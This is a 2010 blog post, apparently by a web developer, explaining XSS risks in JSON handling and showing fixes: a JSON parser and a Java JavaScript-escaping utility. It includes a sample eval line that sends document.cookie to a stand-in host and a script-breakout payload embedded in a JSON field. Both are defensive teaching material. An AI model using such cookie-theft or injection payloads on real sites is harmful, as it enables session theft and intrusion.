Saturday, September 18, 2010

JSON parsing, encoding, and security

JSON is a subset of JavaScript. Unlike other data formats such as XML, JSON can be used in JavaScript without big efforts. This is the main reason why JSON is widely beloved among web developers.

JSON string such as "{name: 'David'}" can be put into an eval function. eval function will call JavaScript interpreter and convert the string into a JSON object: {name: 'David'}.

var jsonStr = "{name: 'David'}";
var jsonObj = eval( "(" + jsonStr + ")" ); 
// jsonObj will be {name: 'David'}

This all looks easy. However, here comes the problem: eval function will execute whatever passed in. If jsonStr is "alert('Gotcha');", eval("alert('Gotcha');") will actually execute the alert call. This opens a wide door to cross-site scripting (XSS) attacks. For example, consider the following string passed in an eval function:

eval(
  '(new Image()).src = 
    "http://www.givemeyourcookie.com/steal_cookie?cookie=" + 
    escape(document.cookie);'
)

The above code will send your cookie to givemeyourcookie.com.

To fix this vulnerability, it is recommended to use a JSON parser to convert strings into JSON objects. A parser in some browsers which provide native JSON support can be even faster than the eval function.

Like the eval function, a JSON parser takes a string and outputs a JSON object. The difference is that the parser will process only when the passed-in string is a valid JSON string. For example, the JSON parser from YUI JavaScript library will throw a SyntaxError if the JSON string contains anything that violates JSON syntax.

var jsonStr = 'alert("Gotcha"); {"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr); // SyntaxError

With a correct JSON string, the following code will run.

var jsonStr = '{"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr);
alert(jsonObj.name); // Prompt "David"

Using JSON parser certainly solves the eval problem. However, this is only half of the story. We web developers usually use scripting language such as PHP or JSP to embed dynamic parts to a page. When we do that, we need to be careful about what we embed.

<script type="text/javascript">
  var jsonObj = 
    YAHOO.lang.JSON.parse('<s:property value="userProfile" />');
</script>

<s:property> is a tag from Struts 2 (a popular MVC framework in Java). What it does is getting a property, in this case a string representation of a userProfile, and embedding the property inside a pair of single quotes to construct a javascript string. The parse function then converts this string to a JSON object.

This will work fine if the userProfile property is a normal user profile:

<script type="text/javascript">
  // userProfile property is { "name": "David", "hobby": "Blogging" }. 
  var jsonObj = 
    YAHOO.lang.JSON.parse('{ "name": "David", "hobby": "Blogging" }');
</script>

However, code will break if the userProfile property is:

{ "name": "David", "hobby": "Blogging in Peet's Coffee" }

The single quote in "Blogging in Peet's Coffee" will prematurely terminate the string, which breaks the JavaScript syntax.

<script type="text/javascript">
  // { "name": "David", "hobby": "Blogging in Peet's Coffee" }. 
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": "Blogging in Peet' // Broken
    s Coffee" }');
</script>

Things could be even worse when userProfile is something like this:

{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}

Pass this property to the parse function, and you will get:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}');
</script>

This is equivalent to:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse('{ "name": "David", "hobby": ""}');
  alert("Evil script goes here");
</script>
"}');
</script>

The above code will run despite the fact that the second </script> tag doesn't have a matched <script> tag. It's pretty scary that a raw JSON string could introduce such XSS attack to your web application, isn't it?

To fix the problem, we need to escape the single quote. We can use unicode \u0027 (equivalent to character ').

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
      '{ "name": "David", "hobby": "Blogging in Peet\u0027s Coffee" }');
</script>

In real world, all user inputs and database data need to be JavaScript-string escaped if they are directly embedded into JavaScript or event handler attributes (e.g. onclick). Single quote is just one of the characters that we need to escape. Here is a list of such characters and their escapes.

Character Escape Description
\\\Backslash
"\u0022Double quote
'\u0027Single quote
<\u003cLess than
>\u003eGreater than
=\u003dEquals
&\u0026Ampersand

I created a Java utility class to escape all these characters. The essential part looks like this:

// A map of characters and their escapes
private static Map<String, String> _mapChar2Escape = 
  new LinkedHashMap<String, String>();

static
{
  // Be sure to have backslash at first.  
  // We don't want to escape backslashes in escaped characters.
  _mapChar2Escape.put("\\", "\\\\");    // Backslash
  _mapChar2Escape.put("\"", "\\u0022"); // Double quote
  _mapChar2Escape.put("'", "\\u0027");  // Single quote
  _mapChar2Escape.put("&", "\\u0026");  // Ampersand
  _mapChar2Escape.put("<", "\\u003c");  // Less than
  _mapChar2Escape.put(">", "\\u003e");  // Greater than
  _mapChar2Escape.put("=", "\\u003d");  // Equals
}

/**
 * Returns a new string that has JavaScript literals escaped.
 * 
 * @param strSource Source string
 * @return
 */
public static String escapeJavaScript(String strSource)
{
  String strEscaped = strSource;

  for (Map.Entry<String, String> entry : _mapChar2Escape.entrySet())
  {
    strEscaped = strEscaped.replace(entry.getKey(), entry.getValue());
  }

  return strEscaped;
}

That's it.

5 comments:

  1. in escapeJavascript(), why do you need to declare string strEscaped = strSource?

    ReplyDelete
  2. Because the String.replace method won't change the passed in string, and it is not recommended to change the strSource input argument. A method/function should have no side effect.

    ReplyDelete
  3. Excelent post David;
    Katelyn is right though, strSource would not be affected outside the function even if you did

    strSource="haha side effects";

    because strings are immutable in java

    not that it matters! I just like splitting hairs.

    ReplyDelete
  4. Yes, you both are right.

    I guess the coding policy in Eclipse won't allow me to re-assign values to arguments. I have a set of customized policies. Kinda restrictive. In most cases, this policy enforced a good practice. Well, in most cases.

    Thanks.

    ReplyDelete
  5. "I very much enjoyed this article.Nice article thanks for given this information. i hope it useful to many pepole.php jobs in hyderabad.
    "

    ReplyDelete